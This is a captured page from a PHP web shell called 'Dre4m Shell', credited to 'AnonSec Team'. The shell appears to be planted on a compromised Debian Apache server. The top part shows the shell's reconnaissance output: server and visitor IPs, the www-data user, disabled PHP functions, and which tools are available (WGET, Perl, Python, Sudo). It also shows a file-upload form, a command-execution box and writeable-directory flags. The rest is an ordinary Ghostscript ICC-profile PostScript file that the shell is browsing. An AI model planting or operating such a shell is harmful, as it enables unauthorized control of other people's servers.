Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.145.170.164
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/task/3/cwd/proc/2/root/usr/share/ghostscript/10.00.0/Resource/Init/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/task/3/cwd/proc/2/root/usr/share/ghostscript/10.00.0/Resource/Init/gs_icc.ps
% Copyright (C) 2001-2021 Artifex Software, Inc.
% All Rights Reserved.
%
% This software is provided AS-IS with no warranty, either express or
% implied.
%
% This software is distributed under license and may not be copied,
% modified or distributed except as expressly authorized under the terms
% of the license contained in the file LICENSE in this distribution.
%
% Refer to licensing information at http://www.artifex.com or contact
% Artifex Software, Inc.,  1305 Grant Avenue - Suite 200, Novato,
% CA 94945, U.S.A., +1(415)492-9861, for further information.
%

% We need LanguageLevel 2 or higher in order to have setuserparams and
% << >> dictionaries
languagelevel dup 2 .max .setlanguagelevel

% ICCBased color space method dictionaries.
% This assumes gs_ciecs2.ps has already been processed.

.currentglobal //true .setglobal

% gs_res.ps uses these entries in colorspacedict
% to populate the ColorSpaceFamily resource, so we need
% to add the supported spaces.
%
systemdict /colorspacedict get begin
/ICCBased [] def
end

NOPSICC { (%END PSICC) .skipeof } if
% Now set up ICC profile loading for PostScript %%BeginICCProfile sections.

/cs-sig-dict <<
  (XYZ ) 3
  (Lab ) 3
  (Luv ) 3
  (YCbr) 3
  (Yxy ) 3
  (RGB ) 3
  (GRAY) 1
  (HSV ) 3
  (HLS ) 3
  (CMYK) 4
  (CMY ) 3
>> readonly def

systemdict begin
/.ProcessICCcomment { % file comment --  file comment
  dup
  (%%BeginICCProfile) anchorsearch {
    pop pop
    DEBUG { (.ProcessICCcomment found %%BeginICCProfile) print flush } if

    % load an ICC profile defined as comments (hex encoded).
    % Ends with %%End at the start of a line. Read the data into
    % an array of strings. This string can be used directly as a
    % source for ReusableStreamDecode filter.
    %
    % stack: --file-- (%%BeginICCProfile: ...)
    1 index 0 (%%EndICCProfile) /SubFileDecode filter
    [ { counttomark 1 add index
        64000 string readhexstring
        not { exit } if
      } loop
    ] exch closefile

    % make a seekable -file- out of the string array
    mark /AsyncRead //true .dicttomark /ReusableStreamDecode filter
    % stack: --file-- (%%BeginICCProfile: ...) --icc_subfile--

    dup 16 setfileposition
    dup (1234) readstring pop
    1 index 0 setfileposition

    //cs-sig-dict exch .knownget {
      3 dict begin
      /Alternate {0 /DeviceGray 0 /DeviceRGB /DeviceCMYK } 2 index get def
      /N exch def
      /DataSource exch def
      [/ICCBased currentdict]
      end
      { setcolorspace } stopped {
        pop
        QUIET not { (   *** Unable to load ICC profile from PostScript DSC comments ***) = flush } if
      } if
    } {
      pop
    } ifelse
  } {
    pop % Not interested in this DSC comment
  } ifelse
} bind def

currentdict /cs-sig-dict undef

% Merge ProcessICCcomment with existing handler
/.ProcessICCcomment load /exec load
currentuserparams /ProcessDSCComment get
dup //null eq {pop {pop pop}} if /exec load
4 array astore cvx readonly
<< /ProcessDSCComment 3 -1 roll >> setuserparams

currentdict /.ProcessICCcomment .undef

end	% systemdict
%END PSICC
.setglobal
.setlanguagelevel

Anon7 - 2022
AnonSec Team